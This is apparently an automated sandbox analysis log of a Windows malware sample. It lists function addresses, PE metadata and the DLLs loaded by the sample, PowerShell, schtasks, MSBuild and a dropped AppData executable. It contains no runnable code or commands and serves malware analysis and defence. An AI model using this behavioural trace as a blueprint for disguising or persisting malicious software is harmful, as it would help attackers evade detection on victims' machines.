Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E0040	8_2_065E0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E0006	8_2_065E0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E5CE7	8_2_065E5CE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_065E053D	8_2_065E053D
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_016025E0	9_2_016025E0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01601C30	9_2_01601C30
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01601438	9_2_01601438
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_016034F8	9_2_016034F8
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0160E4A8	9_2_0160E4A8
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01603984	9_2_01603984
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01600872	9_2_01600872
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01604420	9_2_01604420
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01604411	9_2_01604411
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0160141D	9_2_0160141D
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_016034D6	9_2_016034D6
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01605C92	9_2_01605C92
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01602099	9_2_01602099
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01604F28	9_2_01604F28
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01604F38	9_2_01604F38
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_016057A0	9_2_016057A0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_016057B0	9_2_016057B0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01605241	9_2_01605241
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01605A28	9_2_01605A28
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01605601	9_2_01605601
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01605610	9_2_01605610
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_01605A19	9_2_01605A19
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05174518	9_2_05174518
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176D08	9_2_05176D08
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_051735B0	9_2_051735B0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05172440	9_2_05172440
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517B4A8	9_2_0517B4A8
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05179F88	9_2_05179F88
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517C090	9_2_0517C090
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05172BC0	9_2_05172BC0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517BAF0	9_2_0517BAF0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_051735A0	9_2_051735A0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05174416	9_2_05174416
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_051744C9	9_2_051744C9
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176CF9	9_2_05176CF9
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05179F77	9_2_05179F77
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05175FFF	9_2_05175FFF
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_051747E0	9_2_051747E0
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176657	9_2_05176657
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176658	9_2_05176658
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_051746A3	9_2_051746A3
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517F6E8	9_2_0517F6E8
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05174905	9_2_05174905
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176000	9_2_05176000
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05174857	9_2_05174857
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05177850	9_2_05177850
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517185F	9_2_0517185F
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517305F	9_2_0517305F
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517784C	9_2_0517784C
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05171860	9_2_05171860
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05173060	9_2_05173060
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176890	9_2_05176890
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176880	9_2_05176880
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176B08	9_2_05176B08
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05172390	9_2_05172390
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05172BBF	9_2_05172BBF
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517A218	9_2_0517A218
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517A208	9_2_0517A208
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_0517A2F9	9_2_0517A2F9
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Code function: 9_2_05176AF8	9_2_05176AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0123E6A1	13_2_0123E6A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_01234A98	13_2_01234A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_01233E80	13_2_01233E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_012341C8	13_2_012341C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0123A960	13_2_0123A960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_067265F0	13_2_067265F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_067255A8	13_2_067255A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_06727D98	13_2_06727D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0672B240	13_2_0672B240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_06723058	13_2_06723058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_067276A0	13_2_067276A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_06725CE7	13_2_06725CE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_06722340	13_2_06722340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0672E3B0	13_2_0672E3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_06720040	13_2_06720040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_06720007	13_2_06720007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_06720308	13_2_06720308

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Static PE information: invalid certificate

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1665744842.0000000006600000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1662329813.00000000030BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1661873016.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000000.1614749380.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOZHI.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Binary or memory string: OriginalFilenameOZHI.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Section loaded: appresolver.dll	Jump to behavior
